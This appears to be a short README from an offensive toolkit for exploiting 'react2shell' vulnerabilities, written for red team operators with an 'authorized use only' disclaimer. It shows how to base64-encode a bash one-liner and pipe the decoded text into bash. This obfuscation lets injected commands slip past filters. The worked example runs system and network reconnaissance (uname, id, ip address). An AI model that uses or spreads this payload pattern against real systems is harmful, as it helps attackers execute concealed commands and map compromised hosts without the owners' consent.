Resources for red team operators to discover & exploit react2shell vulnerabilities. For authorized use only. I am not responsible for your actions.
echo “<bash one-liner>” | base64
echo “<base64 encoded one-liner>” | base64 -d | bash
echo "uname -a && id && ip address | grep -oP '.*[\/][0-9].*' " | base64
echo "dW5hbWUgLWEgJiYgaWQgJiYgaXAgYWRkcmVzcyB8ICBncmVwIC1vUCAnLipbXC9dWzAtOV0uKicgCg==" | base64 -d | bash


